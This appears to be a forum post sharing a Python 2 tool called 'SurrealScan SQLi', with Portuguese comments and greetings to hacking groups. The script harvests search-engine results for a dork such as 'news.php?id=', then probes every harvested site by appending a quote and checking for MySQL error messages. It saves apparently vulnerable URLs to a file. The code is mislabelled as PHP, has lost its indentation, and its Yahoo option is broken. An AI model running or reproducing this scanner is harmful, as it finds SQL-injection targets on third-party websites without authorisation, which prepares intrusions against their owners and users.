A simple tool for get websites vulnerables...
Source:
Source:
Código PHP:
#!/usr/bin/env python
# -*- coding: cp1252 -*-
'''
* Sofredor: Rodrigo Correia(#M0rph)
* Facebook: rodrigo.correia.3194
*
* Programa sem lei, você pode e deve copiar e retirar todos os créditos
* do autor, mas se lembre-se, você irá prejudicar um homem de familia,
* que trabalha arduamente todos os dias para alimentar seus filhos,
* passando muitas vezes nessecidades por falta de remuneração pelo
* trabalho prestado para sociedade. Então, pense bem em suas ações.
'''
import re, urllib, urlparse, threading, time
from BeautifulSoup import BeautifulSoup
global handle
pattern_isvull = ["You have an error in your", "mysql_fetch_"] # you can add more
Banner = '''[+] SurrealScan SQLi 0.1\n[+] Code by #M0rph
[+] FB: facebook.com/rodrigo.correia.3194
[+] Gretz: WhiteCollarGroup, http://darkhat.com.br, forum.guiadohacker.com.br
[+] The bitches... 0KaL, WCG147, Slevin, Brloopinha, LostShadow and others =s\n\n'''
def request(url):
res = urllib.urlopen(url)
result = res.read()
return result
def limpar_str(string):
string = string.replace(" "," ")
string = string.replace("&", "&")
return string
def SearchBing(query):
#http://br.bing.com/search?q={query}&first={page}
pattern_nextpage = '<a href=\"([^\"]+)\" class=\"sb_pagN\"'
pattern_getresult = 'sb_tlst\"><h3><a href=\"([^\"]+)\" h'
resultado = []
host = "http://br.bing.com"
url = host+"/search?q="+query+"&first=1"
text = ""
while 1 == 1:
result = request(url)
pattern = re.compile(pattern_getresult)
text = re.findall(pattern, result)
for i in range(len(text)):
resultado.append(text[i])#print text[i]
pattern = re.compile(pattern_nextpage)
text = re.findall(pattern, result)
if ''.join(text) == '':
break
url = host+limpar_str(''.join(text))
return resultado
def SearchYahoo(query):
pattern_nextpage = '<a id=\"pg-next\" href=\"([^\"]+)\"' # OK
pattern_getresult = 'class=\"yschttl spt\" href=\"([^\"]+)\"' # OK
host = "http://search.yahoo.com"
url = host+"/search?p="+query+"&b=0&ei=UTF-8&y=Search&xargs=0&pstart=0"
text = ""
resultado = []
while 1==1:
result = request(url)
pattern = re.compile(pattern_getresult)
text = re.findall(pattern, result)
for i in range(len(text)):
resultado.append(text[i])#print text[i]
pattern = re.compile(pattern_nextpage)
text = re.findall(pattern, result)
if ''.join(text) == '':
break
url = host+limpar_str(''.join(text))
return resultado
def tester(url, current, end):
try:
#print "[+] Process: "+str(current)+" of "+str(end)
global handle
result = request(url+"'")
result = limpar_str(result)
for j in range(len(pattern_isvull)):
if result.find(pattern_isvull[j]) != -1:
handle.write(url+"\n")
#print "[+] Process: "+str(i)+" of "+str(end)
#else:
# print "[+] Process: "+str(i)+" of "+str(end)
except:
pass
def IsVull(result_search):
try:
print "[+] Testing website..."
global handle
handle = open("Vull.txt", 'w')
handle.write('''[+] SurrealScan SQLI 0.1\n[+] Code by #M0rph\n[+] FB: facebook.com/rodrigo.correia.3194\n\n''')
for i in range(len(result_search)):
if threading.activeCount()-2 < 10:
t2 = threading.Thread(target=tester, args=(result_search[i], i, len(result_search)))
t2.start()
else:
i = i - 1
time.sleep(1)
handle.close()
a = open("Vull.txt", 'r')
total_vull = len(a.readlines())-4
print "[+] Websites vull: "+str(total_vull)
except:
print "[-] Erro."
def main():
print Banner
search = raw_input("Search engine -> [1]Bing [2]Yahoo: ")
dork = raw_input("Enter with dork search(Ex: news.php?id=): ")
if int(search) == 1:
print "[!] Please, wait..."
result = SearchBing(dork)
elif int(search) == 2:
print "[!] Please, wait..."
result_yahoo = SearchYahoo(dork)
else:
print "[-] Option invalid."
return 1
re = []
result = set(result)
for i in result:
re.append(i)
print "\n[+] Number of results: "+str(len(re))
IsVull(re)
print "[+] Done."
main()
Comment